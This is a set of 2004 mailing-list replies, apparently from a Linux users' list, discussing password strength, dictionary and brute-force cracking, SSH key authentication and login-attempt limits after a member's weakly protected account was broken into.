for it is actually purty darn long. It is one of those things you hate
to type in. I really think about how long it is, it just flows from the
hands. Now come to think of it... at least 25 characters long.

Key authentication is by far much more secure than a regular password.

Best part is, you can make it so you only have to type your pass phrase
ONCE!
-- 
greg, [EMAIL PROTECTED]

The technology that is
Stronger, better, faster:  Linux


signature.asc
Description: This is a digitally signed message part


Re: See what a weak password will get ya?

2004-07-22 Thread Monique Y. Mudama
On 2004-07-22, Paul Stolp penned:

 Anyways, I've re-downloaded the files the attacker used and removed
 (for posterity.) I changed all passwords, IP Address, I found the
 evidence at about 12:24.  Just wanted to share the need for strong
 passwords.

I'd add the suggestion to not use obvious usernames like guest ... 

Btw, are you 100% sure they never managed to root you and replace some
of your files?

-- 
monique


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-22 Thread Tim Connors
Mathieu Ducharme [EMAIL PROTECTED] said on Thu, 22 Jul 2004 23:33:48 -0400:
 I'm pretty sure dictionary attack also look for this. (?)
 
 Use other characters that will make the word absolutely not dictionar- related
 
 x[([EMAIL PROTECTED])~(w0rD)]x
 
 Still as easy to remember (longer to type though)

I don't rememeber my password, my fingers do.

Which means, that when you come off a plane with your BIOS passwd
protected laptop that you had been using fine for quite some time on
the plane and at the airport, and you develop a massive headache,
then the headache goes away, and you plug in, and try to remember your
password, because your fingers are getting it wrong, well, no good
happens.

So you try to log in to your home institution, thinking that maybe the
BIOS absorbed a few too many cosmic rays, and start panicking, because
none of the passwords you have used in the past 5 years
works. Eventually, let the pain in your head subside, and find out
that that headache simply caused your brain to forget that you changed
passwords about a month back, and somehow your fingers aren't
remembering for the time being :)

-- 
TimC -- http://astronomy.swin.edu.au/staff/tconnors/
Does bacteria culture in coffee cup qualify as pet? Have already
givink it name. -- Pitr Dubovich/User Friendly


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



cracking - Re: See what a weak password will get ya?

2004-07-22 Thread Alvin Oga


On Thu, 22 Jul 2004, s. keeling wrote:

   I disagree.  A cracking program is going to attempt to match
   permutations of dictionary words.  This will not add much more time to

...

how fast can a cracking system go thru dictionary words that are mispelled 
with various digits and special char
- changing o to 0 ( and equivalents ) wont slow down the crackers

- brute force cracking will take 60**8 permutations (1.7x10**14) :-)
( a-z A-Z 0-9 30special chars )
- a small number of permutations by math standards

- but NOT all character positions will be special random
characters which than simplifies the possible permutations

if you can think of these modified passwd, a good cracking program should
already be checking for it too :-)

-- a trick question ... how does the cracker know that they hit the right
   passwd ??
- they cant be logging into your box for each try
- your box should be denying remote access after 3-5 
failed login attempts

- and hopefully, they don't have the passwd file from /etc/shadow
to compare against 

 However, if you haven't moved to RSA based longer passwords, that's
 effectively x[([EMAIL PROTECTED]) (which isn't bad, but you may be typing more than
 is recognized).  Stock passwords are eight chars.  The rest are ignored.

it seem like some systems uses more than 8char pwd and others ignore the
balance ..

c ya
alvin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: cracking - Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Alvin Oga:
 
   - and hopefully, they don't have the passwd file from /etc/shadow
   to compare against 

Agreed.  Once they're in, all bets are off.  Why bother to crack if
you can sniff?


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]